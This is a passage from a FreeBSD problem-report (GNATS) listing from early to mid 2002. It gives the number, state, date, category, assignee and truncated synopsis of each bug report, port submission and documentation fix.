ports/35205 ports New port: russian/mtc - Multifile text En o [2002/02/22] docs/35222 doc mailing list archive URL regexp suboptima o [2002/02/23] kern/35234 World access to /dev/pass? (for scanner) o [2002/02/23] conf/35240 Update to etc/services o [2002/02/23] conf/35242 Change to etc/periodic/weekly/330.catman o [2002/02/23] ports/35244 ports proper fix for x11-fm/endeavour's strcase f [2002/02/23] misc/35245 brian unwanted stealth behaviour (inbound icmp o [2002/02/23] ports/35249 ports no man page for latex2html o [2002/02/23] conf/35262 Generation of boot block for headless ope o [2002/02/23] kern/35269 possible panics with 4:1 filesystem ratio o [2002/02/23] ports/35270 ports converters/p5-Convert-TNEF has wrong pkg- o [2002/02/24] docs/35280 doc [PATCH] null-modem cable pinout in 'Seria o [2002/02/24] ports/35285 ports New port textproc/prosper: a LaTeX class o [2002/02/24] kern/35289 Brooktree device doesnt properly signal a o [2002/02/24] ports/35298 ports New port: biology/primer3 o [2002/02/25] kern/35324 Plug and Play probe fails to configure Di o [2002/02/25] ports/35330 ports New port: biology/wise o [2002/02/25] ports/35332 ports New port: biology/flip s [2002/02/25] bin/35333 send-pr(1) vim syntax highlighting suppor o [2002/02/26] docs/35343 doc Old broken Unix docco Makefiles o [2002/02/26] ports/35355 ports New port: databases/gbib f [2002/02/27] ports/35372 ports pgp6 ports fails to compile on alpha plat o [2002/02/27] ports/35375 kde x11/kdebase2 creates files not listed in o [2002/02/27] kern/35377 process gets unkillable (-9) in "ttywai" o [2002/02/27] docs/35378 doc Handbook has inaccurate description of f o [2002/02/27] misc/35381 incorrect floating-point display of large o [2002/02/27] ports/35383 ports new port DarwinStreamingServer o [2002/02/27] kern/35392 atapi tape driver does not maintain devic o [2002/02/27] bin/35393 tjr Patch to add STANDARDS section to strerro o [2002/02/28] misc/35400 sysinstall could improve manipulation of o [2002/03/01] ports/35447 ports Update port: databases/p5-SQL-Statement t o [2002/03/01] bin/35451 PATCH: pkg_add -r able to save local copy o [2002/03/01] ports/35456 portmgr [PATCH] Add a distfiles-list target f [2002/03/01] conf/35457 dual boot problem from 2 different SCSI d s [2002/03/01] ports/35459 ports portupgrade doesn't clean up dependencies o [2002/03/02] ports/35479 ports New Port: A small stand-alone program for o [2002/03/02] ports/35481 ports New port: console text editor looks like o [2002/03/03] kern/35512 ATA/ATAPI CD driver: impossible to set cd o [2002/03/03] ports/35514 portmgr Use the value of hw.machine_arch instead o [2002/03/03] ports/35520 ports New port devel/whups: a web-based bug tra a [2002/03/03] bin/35521 nsupdate fails if destination dns is not o [2002/03/03] ports/35522 ports xhtml port uses SGMLDECL in catalog chain o [2002/03/03] docs/35523 doc manpage fixes for df(1) and ls(1) o [2002/03/03] ports/35525 ports update-port: graphics/jpeg2ps-letter o [2002/03/03] i386/35526 No mouse recognized in Compaq Presario la o [2002/03/04] misc/35542 bde BDECFLAGS needs -U__STRICT_ANSI__ o [2002/03/04] conf/35545 Enhanced periodic scripts o [2002/03/04] ports/35549 sada new port editors/texmacs doesn't build on o [2002/03/05] ports/35566 ports new ports: Lire a multiple log files anal o [2002/03/05] ports/35567 ports update port: databases/dbconnect o [2002/03/05] bin/35568 make declares target out of date, but $? o [2002/03/05] docs/35575 doc Pw(8) man page makes no mention of /var/l o [2002/03/05] ports/35578 lkoeller mail/faces: make NAS default since xfaces o [2002/03/05] ports/35580 ports Starup script in /usr/local/etc/rc.d is i o [2002/03/06] ports/35594 ports Bug: misc/kwatch fails to build if autoco f [2002/03/06] i386/35599 murray install o [2002/03/06] docs/35602 doc dump(8)/restore(8) pages don't explain "a o [2002/03/06] docs/35607 doc dump(1) page needs discussion of scary er o [2002/03/06] docs/35608 doc mt(1) page uses "setmark" without explana o [2002/03/06] docs/35609 doc mt(1) page needs explanation of "long era o [2002/03/06] docs/35612 doc ps(1) page "state" description doesn't me o [2002/03/06] ports/35617 lkoeller mail/faces: add USE_SOX, WITHOUT_AUDIO kn o [2002/03/07] kern/35635 sheldonh [patch] missing dep in libiconv prevents o [2002/03/07] ports/35638 markm tn3270 dumps core unconditionally o [2002/03/07] ports/35639 ports executable name conflicts: ploticus and s o [2002/03/07] docs/35642 doc lo(4) page maybe should document optional o [2002/03/07] docs/35644 doc lo(4) page presumes familiarity with prin o [2002/03/07] docs/35646 doc cp(1) page needs a "Bugs" section. o [2002/03/07] docs/35647 doc www; combine query-by-number and multi-fi o [2002/03/07] docs/35648 doc rc.conf; add note about "flags" to both f o [2002/03/07] docs/35649 doc mount_smbfs(8) page: "See ./examples/dot. o [2002/03/07] ports/35661 ports new port: mycb o [2002/03/07] ports/35666 portmgr new bsd.port.mk support for GCC 2.95 and o [2002/03/08] ports/35667 ports net/pppload patch so it doesn't show wron o [2002/03/08] ports/35668 ports Link sqsh with readline o [2002/03/08] ports/35670 ports /usr/ports/databases/sqsh - bogus depende o [2002/03/08] bin/35671 wrong comments in rc.diskless1 o [2002/03/08] ports/35682 ports apache13-ssl needs update o [2002/03/08] docs/35686 doc blackhole(4) page seems to contradict its o [2002/03/08] docs/35687 doc /etc/nsmb.conf missing mention of readers o [2002/03/08] docs/35696 doc mount_smbfs(8) references a nonexistent n o [2002/03/08] kern/35699 [PATCH] msdosfs: differrent masks for dir o [2002/03/08] kern/35700 a small code update o [2002/03/09] ports/35708 ports New port: audio/abcmidi utilities for abc o [2002/03/09] ports/35710 portmgr Request repocopy: devel/automake -> devel o [2002/03/09] docs/35711 des the "gnats page" should move to its own s o [2002/03/09] bin/35717 which(1) returns wrong exit status for m o [2002/03/09] misc/35727 man(1) program should not display (old) d o [2002/03/10] docs/35732 doc adduser(8) page has obsolete reference an o [2002/03/10] ports/35737 ports New port: audio/abcselect - extract part o [2002/03/10] ports/35753 ports New Port: biology/act o [2002/03/10] ports/35762 ports Speak Freely hangs while reading from aud o [2002/03/11] misc/35764 Icewm does not display APM status properl o [2002/03/11] ports/35767 portmgr make_index script does not deal with syml o [2002/03/11] bin/35769 w does not correctly interpret X sessions f [2002/03/11] ports/35784 ports reposting pic2fig port as a diff against o [2002/03/11] docs/35800 obrien [PATCH] removal of -kthread in gcc man pa o [2002/03/11] bin/35812 strings(1) does'n print russian character o [2002/03/12] docs/35823 doc [PATCH] Little Restructuring of the Devel o [2002/03/12] ports/35833 ports ports/chinese/arphicttf and CJK depend on o [2002/03/12] bin/35838 Change to size of WID_IF in usr.bin/netst o [2002/03/13] kern/35846 timeout in wi_cmd 11, machine hangs for a o [2002/03/13] ports/35859 ports New port: Network traffic accounting daem o [2002/03/13] kern/35861 brooks if_vlan module is compiled with ZERO vlan o [2002/03/13] ports/35864 ports ports with invalid dependencies to glib13 o [2002/03/13] misc/35865 pam_krb5 crashes in pam_sm_setcred() o [2002/03/13] kern/35876 bus_dmamem_free does not call contigfree o [2002/03/13] ports/35879 portmgr autoconf-2.52_2 creates empty case/esac s o [2002/03/13] ports/35882 ports Perl Expect module send_slow hangs on EOF o [2002/03/13] kern/35883 probe for ATI Rage128 Pro o [2002/03/14] bin/35886 [patch] Enhancement: custom time format f o [2002/03/14] bin/35894 bbraun popen.c in cron won't build without LOGIN o [2002/03/14] ports/35897 ports upgrading the linux_base port runs into t o [2002/03/14] kern/35900 Changing RealTek 8139 MAC address fails f [2002/03/14] misc/35918 Xset , XTGA and Xhtml Damaged o [2002/03/14] ports/35919 ports CompuPic 5.1.1016 o [2002/03/15] ports/35927 portmgr Permission sought to commit this automake o [2002/03/15] ports/35937 ports New port: taipan-0.9 o [2002/03/15] docs/35939 doc ipfw(8) needs explicit statement about no o [2002/03/15] docs/35941 doc cd(4) manual doesn't mention "target" use o [2002/03/15] docs/35942 doc at(1) manual doesn't describe at.allow an o [2002/03/15] docs/35943 doc at(1) config files are misplaced in /var/ o [2002/03/15] ports/35946 ports The /usr/local/lib/RealPlayer8/postinstal o [2002/03/15] docs/35948 trhodes disklabel(8) manual uses archaic "pack" a a [2002/03/15] docs/35951 trhodes disklabel(8) manual confuses partitions a o [2002/03/15] docs/35953 doc hosts.equiv(5) manual is confusing or wro p [2002/03/15] docs/35967 keramida rc.conf(5) manual missing "dumpdir" and " o [2002/03/16] kern/35978 improve kobj method dispatch o [2002/03/16] kern/35988 Seimens SpeedStream PCI/PCMCI Adaptor for o [2002/03/16] kern/35993 murray sys/dev/amr/amr.c - Compiler warnings und o [2002/03/16] ports/35995 ports New port: ophoto f [2002/03/16] kern/35999 scsi add support for general flash disks to sc f [2002/03/17] bin/36000 contrib/amd uses mktemp o [2002/03/17] ports/36020 jmz Update port: print/musixtex T.98 -> T.104 o [2002/03/17] ports/36024 sobomax port update: OpenJIT 1.1.16 for JDK 1.3.1 o [2002/03/17] ports/36026 steve Update port: x11-toolkits/open-motif to 2 o [2002/03/17] ports/36034 ports new port databases/pg-crypto o [2002/03/18] docs/36055 doc [PATCH] adding some help-yourself-info to o [2002/03/18] ports/36061 perky New port: net/jmsn s [2002/03/18] standards/36076standardsImplementation of POSIX fuser command o [2002/03/18] ports/36078 portmgr Fix MASTER_SITES_NN recursive bug o [2002/03/18] ports/36079 portmgr Support USE_LESSTIF=yes o [2002/03/18] ports/36080 portmgr Support USE_OPENSSL=yes on 4.2 o [2002/03/18] ports/36083 portmgr Installs existing packages for dependecie o [2002/03/19] standards/36087tjr P1003.1-2001 c99 utility o [2002/03/19] ports/36089 ports new port: net/isba - a Perl/Tk GUI for ip o [2002/03/19] misc/36110 dmesg output corrupt if /dev/console is b o [2002/03/19] ports/36112 portmgr [PATCH] New feature for whole ports tree: o [2002/03/19] ports/36113 dirk Add gdbm, BerkeleyDB2, BerkeleyDB3, libio o [2002/03/19] conf/36118 re 4.5 Upgrade says it won't touch /usr/src, o [2002/03/20] ports/36129 ports Update Port:databases/libiodbc(support pt p [2002/03/20] standards/36130standardsP1003.2 asa utility is missing o [2002/03/20] bin/36136 savecore -z option does not work o [2002/03/20] misc/36143 Dynamic (non linear) mouse acceleration a o [2002/03/20] misc/36153 /usr/src/games/fortune/README instruction o [2002/03/20] misc/36154 Getting USB mouse to work: usbd and mouse o [2002/03/21] ports/36162 ports New Port: p5-IO-Socket-Multicast o [2002/03/21] misc/36165 boehm-gc BUS error with gdb o [2002/03/21] kern/36170 an(4) does an_init() even if interface is o [2002/03/21] ports/36178 ports New Port: bozohttpd-0.59 o [2002/03/21] ports/36186 ports New Port: www6to4 version 1.5 p [2002/03/21] standards/36190tjr P1003.1-2001 newgrp command f [2002/03/22] ports/36202 wosch update to sysutils/socket: NetBSD IPv6 pa o [2002/03/23] ports/36238 sf [patch] ftp/wget doesn't respect FTP_PASS o [2002/03/24] misc/36250 grog /dev/vinum device entries have a group of o [2002/03/24] ports/36251 ports New port: lang/cocor (Coco/R, a compiler a [2002/03/24] ports/36252 petef Fix build of misc/Howto / take maintainer o [2002/03/24] ports/36260 sobomax freetype2 needs libintl.so.1 in gettext-0 o [2002/03/24] bin/36262 [PATCH] Fixed rusers idle-time reporting o [2002/03/24] kern/36274 75GXP drive ATA tagging failure makes df o [2002/03/26] alpha/36327 alpha trap within cvt() while attempting to pri o [2002/03/26] ports/36336 ports port of ccmalloc o [2002/03/26] ports/36341 dburr [patch] devel/SN marked as broken o [2002/03/26] misc/36359 fxp driver and Intel Pro/100 S NIC (0002B o [2002/03/26] ports/36361 ports apache13-ssl installs 'httpsd.conf' and l o [2002/03/26] ports/36364 ports apache13-ssl - 'make certificate' fails o [2002/03/27] misc/36368 sshd error: session_close_by_channel: ki o [2002/03/27] bin/36374 Patch (against core dumps) and improvemet o [2002/03/27] kern/36381 ata + hw.ata.wc=1: high CPU load for larg o [2002/03/27] misc/36385 luigi crunchgen does not handle Makefiles with o [2002/03/27] ports/36386 adrian www/squid24 might overwrite perms on log o [2002/03/27] misc/36392 cron starts before vi recover, and vi rec o [2002/03/27] bin/36397 sos incorrect information in ata(4) o [2002/03/27] kern/36410 Bad mac address return from FNW-9803-T (A o [2002/03/28] conf/36416 imp Addition to /etc/defaults/pccard.conf o [2002/03/28] bin/36418 imp pccardd added option to exit after probe o [2002/03/28] kern/36425 bump up SYS_NMLN in sys/utsname.h o [2002/03/28] bin/36431 src/secure/lib/libtelnet fails in CURRENT o [2002/03/28] docs/36432 doc Proposal for doc/share/mk: make folded bo o [2002/03/28] docs/36449 doc symlink(7) manual doesn't mention trailin s [2002/03/28] ports/36452 ports Update port: security/fwlogwatch to 0.7 o [2002/03/28] docs/36459 doc tftp(1) manual's "get" syntax/description o [2002/03/28] gnu/36460 cu(1) program does not work very well. f [2002/03/28] ports/36466 cy please remove biology/seaview f [2002/03/29] bin/36477 gshapiro mailwrapper doesn't handle rmail calls o [2002/03/29] bin/36501 /usr/bin/calendar can't handle recurring o [2002/03/29] ports/36503 ports several files conflict in ports/databases o [2002/03/29] docs/36524 doc bad links on handbook index page f [2002/03/30] ports/36531 ports let eterm with chinese support o [2002/03/30] misc/36536 Apparent mother board incompatability o [2002/03/30] misc/36541 portmgr port: make install as normal user retries o [2002/03/30] ports/36545 jmz mwrite is an absolute symbolic link to /u o [2002/03/30] bin/36553 Two new features in newsyslog(8) o [2002/03/30] misc/36556 patch: regular expressions for tcpwrapper o [2002/03/30] ports/36557 perky Fix port: security/py-amkCrypto (to refle o [2002/03/30] ports/36560 rse bug fix for the eperl package o [2002/03/30] ports/36561 nakai slib package bug fix o [2002/03/30] bin/36564 fdisk(8) program has misplaced NOT_NOW bl o [2002/03/31] ports/36568 vanilla New port: chinese/chinput3 o [2002/03/31] kern/36569 umass fails when RiteLink Pocket Disk is o [2002/03/31] ports/36582 taoka Update port: japanese_kinput2-freewnn to o [2002/03/31] ports/36587 des news/inn{-stable} do not install when --e f [2002/04/01] ports/36619 ports A gtk SMB share browser o [2002/04/01] ports/36622 dburr [patch] devel/SN : Upgrade port to versio o [2002/04/01] bin/36626 login_cap(3) incorrectly claims that all o [2002/04/01] docs/36628 doc header an footer of openssl manpages are o [2002/04/01] docs/36629 kris OpenSSL manpages should be reachable with o [2002/04/01] bin/36634 murray dhclient is quiet and cannot be made loud o [2002/04/01] ports/36644 ports new port -- gtkspell o [2002/04/01] misc/36646 dwmalone [PATCH] Top does not work correctly in a o [2002/04/02] kern/36682 USB isochroneous transfer doesn't report o [2002/04/02] ports/36684 ports patch for http://www.freebsd.org/cgi/quer o [2002/04/02] ports/36685 ports annoying warnings from mc with tcsh in ho o [2002/04/03] kern/36692 Patch for E-Tech ISA PnP modem support o [2002/04/03] ports/36709 portmgr bsd.port.mk MASTER_SITES:n - add comma op o [2002/04/03] docs/36723 doc IPSec section is unintelligible o [2002/04/03] docs/36724 doc ipnat(5) manpage grammar is incomplete an o [2002/04/03] docs/36726 trhodes Handbook lacks information about hardware o [2002/04/03] docs/36727 trhodes Mail chapter of Handbook is incomplete o [2002/04/04] bin/36740 make ps obey locale (particularly for tim o [2002/04/04] bin/36757 EnhancementRequest binary which ought to o [2002/04/04] ports/36766 portmgr Incompatibility between autoconf, automak o [2002/04/05] bin/36785 Add support for $ character in usernames o [2002/04/05] bin/36786 make ps use 24-hour time by default o [2002/04/05] ports/36792 ports Fix pkg-plist of shells/perlsh o [2002/04/05] ports/36795 kuriyama DocBook DSSSL stylesheets should install o [2002/04/05] ports/36801 ports Update port: misc/compat3x o [2002/04/05] ports/36802 ports Update port: misc/compat4x o [2002/04/05] ports/36806 portmgr bsd.port.mk MASTER_SITES:n group protecti o [2002/04/06] ports/36828 sobomax Mesa3 port broken when using XFREE86_VERS o [2002/04/06] ports/36832 ports apache13-* coredumps when using XML::Pars o [2002/04/06] docs/36837 jim Handbook lacks information about setting o [2002/04/07] ports/36841 ports use of .MAKEFLAGS target in Makefile.loca a [2002/04/07] kern/36845 scsi Add ioctls CDRIOCREADSPEED/WRITESPEED to o [2002/04/07] ports/36849 cy FVWM-Themes fails to switch themes f [2002/04/07] bin/36859 sos burncd fails in dao mode for audio o [2002/04/08] bin/36884 add support id_rsa (OpenSSH/RSA2) authent o [2002/04/08] ports/36887 tobez Update port: www/p5-CGI.pm 2.753 to 2.80 o [2002/04/08] ports/36901 glewis WITHOUT_X11 Knob for port java/jdk13 o [2002/04/08] bin/36902 [patch] proposed new format code %N for s o [2002/04/08] ports/36913 ports New port: devel/ruby-rbprof o [2002/04/08] misc/36916 DOS active partition flag lost in libdisk f [2002/04/09] misc/36923 fdesc file system (partially) crashes Fre o [2002/04/09] ports/36932 ports New Port: scmxx 0.6.0 (Data Exchange util o [2002/04/09] ports/36933 portmgr [PATHCES] New feature for pkg_create and o [2002/04/09] ports/36939 ports New Port: devel/popenhs -- A popen-like l o [2002/04/09] ports/36940 ports Port update acid-0.9.6b20 to acid-0.9.6b2 o [2002/04/09] ports/36945 ports new ports of libsigc++12 and gtkmm o [2002/04/09] ports/36951 glewis Java (aka 1.3.1-p6-root-020405-00:26) cor o [2002/04/09] kern/36952 ldd comand of linux does not work f [2002/04/09] bin/36955 yar Stock ftpd does not reuse ports in passiv o [2002/04/10] ports/36959 ports New port: Gnewtellium is yet another new o [2002/04/10] bin/36960 calendar doesn't effect -t option. o [2002/04/10] ports/36962 obrien new version of news/aub o [2002/04/10] ports/36967 ports New port: news/slrnface o [2002/04/10] kern/36983 CD9660 unicode to utf-8 [hack] o [2002/04/11] conf/36990 pccard I/O DATA PCET10-CL worked o [2002/04/11] ports/37000 ports New Port: agqt 0.9.1 (Audiogalaxy query t o [2002/04/11] ports/37002 ports Port Update: (security/fwlogwatch) from 0 o [2002/04/11] ports/37003 ports new port: misc/susv2 (Single UNIX Specifi o [2002/04/11] ports/37004 ports new port: misc/susv3 (Single UNIX Specifi o [2002/04/11] bin/37013 ls directory name output trailing slash d f [2002/04/12] ports/37019 ports New port: poink 1.5 (Nosuid, secure ping o [2002/04/12] ports/37020 ports New port: www/muwi o [2002/04/12] ports/37027 ports New port: lookout-1.1 (Outlook 97 address o [2002/04/13] misc/37034 Fixed maximum character length in EUC o [2002/04/13] docs/37037 keramida Cleaned and revised the Hubs article o [2002/04/13] ports/37044 ports lesstif needs an update o [2002/04/13] misc/37047 brian daily_status_mailq_shorten doesn't produc o [2002/04/13] kern/37052 Quirk: ADS Tech Drive Kit 2.0 USB DA_Q_N o [2002/04/14] ports/37054 ports Problem report: (misc/flexbackup) doesnt o [2002/04/14] ports/37059 ports New port: gtk-iminc o [2002/04/14] ports/37062 ports New port: textproc/pocketreader o [2002/04/14] ports/37066 ports ports/databases/postgresql-tcltk is not u o [2002/04/14] misc/37073 Few new tips for FreeBSD-tips fortune o [2002/04/14] bin/37074 [PATCH] Typographical error in output of o [2002/04/14] bin/37079 des fetch complains about "size of remote fil o [2002/04/14] bin/37083 small improvement to talk(1): add clocks o [2002/04/15] ports/37095 ports ports/net/p5-Net-SSH-Perl already builds o [2002/04/15] bin/37096 Fixes to fsdb command-line handling [patc o [2002/04/15] ports/37098 nakai Update patches for slib port f [2002/04/15] ports/37100 ports Maintainer update: textproc/dico (portsur o [2002/04/15] ports/37111 ports new port: net/ccmsn o [2002/04/15] ports/37123 ports New port: net/arpd o [2002/04/15] ports/37128 ports New port: www/sarg, formerly known as www o [2002/04/16] i386/37137 FreeBSD install doesn't recognize version o [2002/04/16] misc/37160 qa /stand/sysinstall coredumps when trying t o [2002/04/16] misc/37161 ext2 linux file system, error handling la o [2002/04/17] docs/37176 ru similar nits in assorted man pages o [2002/04/17] ports/37185 ports New Port: nrpep (netsaint remote plugin e f [2002/04/17] ports/37186 ade Dbview contains an error, because of whic o [2002/04/17] ports/37187 mita ports/japanese/vfghostscript font-2.6.2 f o [2002/04/17] ports/37195 ports New port: deskutils/mencal o [2002/04/18] misc/37219 [it_IT locale] LC_TIME, weekday names o [2002/04/18] docs/37221 doc obsolete reference to seqpacket in mount_ o [2002/04/18] ports/37226 mita ports/japanese/vfghostscript5 doesn't fin o [2002/04/18] kern/37227 VMWare do not work with raw disks due to o [2002/04/19] misc/37244 ports c2lib port includes vector.h which appare o [2002/04/20] ports/37289 flathill Update net/micq to 0.4.8.pl3 o [2002/04/20] ports/37290 ports New port: tool for setting the title of x o [2002/04/20] ports/37298 ports New port: security/cp2fwb o [2002/04/20] misc/37301 4.5 rc.firewall type simple does not pass o [2002/04/21] conf/37310 add inode information into daily_status_d o [2002/04/22] bin/37334 phk fix jail.8 instructions for creating jail o [2002/04/22] ports/37337 portmgr [repo-copy request] converters/mule-ucs-e o [2002/04/22] ports/37342 ambrisko ports/misc/airoflash fetches source every o [2002/04/22] kern/37347 _POSIX_THREADS defined but sysconf(_SC_TH o [2002/04/22] ports/37354 ports New port: Perl-compatible regexp for Ocam o [2002/04/22] ports/37359 ports New port: games/bsp - A node builder for o [2002/04/22] ports/37362 ports The Ted port is incompatible with FreeBSD o [2002/04/22] ports/37364 ports New Port: GeekLog o [2002/04/23] ports/37366 kde kdeutils-3.0: kdepasswd truncates passwor o [2002/04/23] ports/37367 ports palm/plucker: fix build problem when late o [2002/04/23] kern/37374 joe [PATCH] closing ums0 blocks with wmesg uh s [2002/04/23] kern/37378 scsi [PATCH] No 6-byte-read on Wincan USB pen o [2002/04/23] i386/37379 /dev/MAKEDEV entry for RocketPort is brok o [2002/04/23] misc/37380 boot0 partition list is outdated (patch i o [2002/04/23] misc/37387 bsdmainutils/calendar Hungarian addon fil o [2002/04/23] ports/37389 ports Port Update sysutils/diskusage o [2002/04/23] conf/37395 peter even with NO_SENDMAIL=true, /usr/sbin/sen o [2002/04/23] conf/37404 delayed mouse response to draw box or hig o [2002/04/23] kern/37405 Support for Mitsumi USB Mouse with Memory o [2002/04/24] ports/37409 znerd New port: jdictionary-eng-hun 1.2 - Hunga o [2002/04/24] ports/37412 kde kdebase2 port package does not create /us o [2002/04/24] kern/37417 Treat CT5880 revision4 ( PCM chip ) o [2002/04/24] ports/37422 ports port upgrade news/diablo 3.0 -> 4.1 o [2002/04/24] bin/37424 nfsstat reports negative values o [2002/04/24] misc/37425 df gives wrong ouput > 1TB o [2002/04/24] misc/37434 dhclient generates pointless log messages o [2002/04/24] bin/37437 Add HTTP-style support to {vis,unvis}(1). o [2002/04/24] ports/37439 anders Alfred's Patches to thttpd port to use se o [2002/04/24] bin/37442 [PATCH] sleep.c to support time multiplie o [2002/04/25] ports/37446 znerd New port: jdictionary-eng-hun-expr 1.2 - p [2002/04/25] bin/37448 obrien [PATCH] ldd/rtld support for more informa o [2002/04/25] ports/37452 ports New port: devel/publib: Modular library o o [2002/04/25] docs/37457 doc acpi(4) man page references non-existant o [2002/04/25] ports/37459 ports Patch for ocaml-pcre port (PR 37354) o [2002/04/25] ports/37462 jmz dvips is no more available separately fro o [2002/04/25] docs/37465 doc Handbook needs new section o [2002/04/25] ports/37469 ports new port: otc o [2002/04/25] docs/37470 doc jail field not documented in procfs(5) o [2002/04/25] ports/37474 anders freeamp doesn't build on -current o [2002/04/25] ports/37476 ports Updating the port of biology/molden o [2002/04/26] kern/37486 Bug in network stack in sending broadcast o [2002/04/27] docs/37504 blackend The word PC Card should be used instead o o [2002/04/27] ports/37518 grog gmat port CATALOG needs updating o [2002/04/28] ports/37521 ports new port: security/autossh o [2002/04/28] kern/37526 Addtron card not being recognized by driv o [2002/04/28] ports/37536 ports New port: games/doomlegacy o [2002/04/28] ports/37542 anholt XFree86 4.2.0 Server MGA G550 Corrupted H o [2002/04/29] kern/37554 [PATCH] Make ELF shared libraries immutab o [2002/04/29] kern/37555 vnode flags appear to be changed in non-s o [2002/04/29] docs/37557 doc there is no ciss(4) RAID controller man p o [2002/04/29] docs/37558 doc there is no iir(4) RAID controller man pa o [2002/04/29] docs/37559 doc there is no ida(4) RAID man page o [2002/04/29] misc/37562 jdp Incorrect information in /usr/share/examp o [2002/04/29] ports/37567 ports New port devel/qextmdi o [2002/04/29] misc/37569 [PATCH] Extend fstab(5) format to allow f o [2002/04/29] bin/37572 des libfetch(3)/fetch(1): requested feature: o [2002/04/29] ports/37574 taoka ports/print/pips-sc20 file not found on m a [2002/04/29] ports/37576 portmgr Opening new port category hungarian o [2002/04/30] ports/37596 ports EMACS_PORT_NAME=xemacs21 forks make infin o [2002/04/30] ports/37597 ports aureal-kmod-1.5_3 fails to build o [2002/04/30] kern/37600 [Partial PATCH] t4dwave drive doesn't rec o [2002/04/30] conf/37611 phk proposed /etc/rc.jails for jail(8) manage o [2002/05/01] ports/37630 kde KDE does not work with IPv6 o [2002/05/01] ports/37632 ports new port: pstack o [2002/05/01] misc/37634 FTP site problem - packages link points t o [2002/05/01] ports/37638 ports gd doesn't build with TrueType support o [2002/05/01] ports/37649 dirk devel/pear: unbreaking, upgrading to 4.2, o [2002/05/01] bin/37650 Add skipPCCARD variable to sysinstall o [2002/05/01] ports/37654 ports Update textproc/xml4j to 4.0.1HTML conve o [2002/05/20] ports/38339 ports New Port: Stylesheets for TEI->FO convers o [2002/05/20] ports/38340 ports New Port: DTD parser and clean-up tool o [2002/05/20] ports/38341 ports New Port: Customize TEI DTDs o [2002/05/20] misc/38347 new library function abs2rel and rel2abs. o [2002/05/20] ports/38351 ports mod_php4(WITH_APACHE2) +apache2(WITH_THRE o [2002/05/20] ports/38365 ports devel/swarm update for Java support o [2002/05/21] kern/38372 patch for puc(4) to support parallel port o [2002/05/21] bin/38388 request to add "openssl starttls" command o [2002/05/22] ports/38406 obrien incorrect .so in g++31.1 man page o [2002/05/22] ports/38408 wjv zope-zmysqlda does not run o [2002/05/22] kern/38419 add name "CanoScanN676U" in uscanner o [2002/05/22] docs/38426 doc extra manpage .Xr to locate relevant sysc o [2002/05/22] kern/38429 [PATCH] getgpid and getsid work for proce o [2002/05/22] kern/38445 Centralized ptrace() permission checking o [2002/05/23] ports/38450 ports New Port: audio/blop: Bandlimited oscilla o [2002/05/23] ports/38451 kris the package of totd-1.3_1.tgz seems incor o [2002/05/23] misc/38452 Logitech USB iFeel: device_probe_and_atta o [2002/05/23] kern/38458 There is no a file iicbb_if.c on source t o [2002/05/23] bin/38467 less can dump core, FPU exception o [2002/05/23] misc/38468 Write drivers for Intel PRO/Wireless 2011 o [2002/05/23] ports/38476 ports ports/security/nmapfe: install problem o [2002/05/23] i386/38477 qa In sysinstall's Choose Distributions scre o [2002/05/23] i386/38478 qa In sysinstall's Choose Distributions scre o [2002/05/23] i386/38479 sysinstall vs. adduser UID inconsistency o [2002/05/23] i386/38480 qa sysinstall should prompt for normal users o [2002/05/23] i386/38481 dwmalone adduser typo: 'already exist' o [2002/05/24] www/38500 www gnats web form is overenthusiastic about o [2002/05/24] ports/38516 ports ICQv7 transport for the Jabber Server o [2002/05/24] i386/38524 cons25 doesn't support F-keys beyond 12 o [2002/05/25] ports/38539 ports New port: devel/libcfg+ o [2002/05/25] docs/38540 rpratt sysinstall application name should be Sys o [2002/05/25] ports/38541 ports ghostscript-gnu checksum mismatch for a d o [2002/05/25] ports/38555 ports New port: x11-toolkits/frantk (A GUI libr o [2002/05/25] docs/38556 doc EPS file of beastie, as addition to exist f [2002/05/25] conf/38559 rc.network hangs for a long time attempti o [2002/05/26] bin/38573 ping -o option (exit after one reply) o [2002/05/26] docs/38574 doc CPUTYPE is not documented in make.conf o [2002/05/26] kern/38575 NoName USB Flash drive not working o [2002/05/26] misc/38583 qa sysinstall installs crypto sources when / o [2002/05/26] ports/38593 portmgr Third level ports o [2002/05/26] i386/38596 freebsd 4.6rc2 can't support ati videocar o [2002/05/27] bin/38610 qa Sysinstall should be able to mount ISO im o [2002/05/27] ports/38616 ports Build options in Makefile.local are ignor o [2002/05/27] docs/38618 doc Malloc types can be used with multiple al o [2002/05/27] docs/38620 doc Committers Guide and CVS o [2002/05/27] ports/38621 mita Update port: print/ghostscript-gnu-commfo o [2002/05/27] kern/38626 luigi dummynet/traffic shaper: RED: max_th and o [2002/05/27] ports/38635 ports new port: comms/bforce-kst o [2002/05/27] ports/38638 ports New ports : gfaim 0.30 o [2002/05/27] ports/38642 ports Fatal server error o [2002/05/27] docs/38647 doc cvsupit built-in instructions are slightl o [2002/05/28] ports/38655 ports Update New port : ports/38641 (DynDns Ser o [2002/05/28] kern/38657 fujitsu c4110 lifebook crashes on resume o [2002/05/28] ports/38663 ports New Port: Mono .NET runtime and C# compil o [2002/05/28] www/38664 www Stale info about Java due to be released o [2002/05/28] ia64/38677 ia64 savecore fault when 1M buffer is allocate o [2002/05/28] ia64/38678 ia64 vinum fails to build due to @gprel reloca o [2002/05/29] bin/38686 des fetch -T n is not timeout correctly when o [2002/05/29] ports/38687 ports Update port: security/fwbuilder o [2002/05/29] ports/38689 kuriyama update of port palm/prc-tools o [2002/05/29] misc/38724 portmgr [patch] various .mk files use deprecated o [2002/05/29] ports/38725 lioux new port: biology/L-Breeder o [2002/05/29] misc/38727 mptable should complain about garbage arg o [2002/05/29] kern/38730 Memorex scrollpro mouse is not fully func o [2002/05/30] kern/38749 Diskless booting fails with some DHCP ser o [2002/05/30] ports/38751 ports Port for discid o [2002/05/31] docs/38772 doc firewall_type feature not mentioned on Ha o [2002/05/31] kern/38792 sound Cannot play audio on a VIA VT8233 chipset o [2002/06/01] ports/38800 ports update www/roxen to Roxen WebServer 2.2.2 o [2002/06/02] ports/38805 ports New port: devel/greencard (A foreign func o [2002/06/02] docs/38810 doc Minor change in section 2.13.5 of the Han o [2002/06/02] docs/38815 doc Many typo fixed, and a question left unan o [2002/06/02] docs/38817 doc /usr/share/man/man8/boot.8.gz documents / o [2002/06/02] ports/38821 gnome graphics/gimp1 complains about missing Gi o [2002/06/02] ports/38824 sf wget cannot handle files >2GB o [2002/06/02] i386/38826 RFE: BootMgr should provide more identify o [2002/06/02] kern/38828 DPT PM2012B/90 doesn't work o [2002/06/02] conf/38829 bootblock recompile instructions in handb p [2002/06/03] docs/38850 keramida handbook/kernelopts/ should be in Develop o [2002/06/03] ports/38853 portmgr net/ethereal: configure fails o [2002/06/03] misc/38854 Resetting the 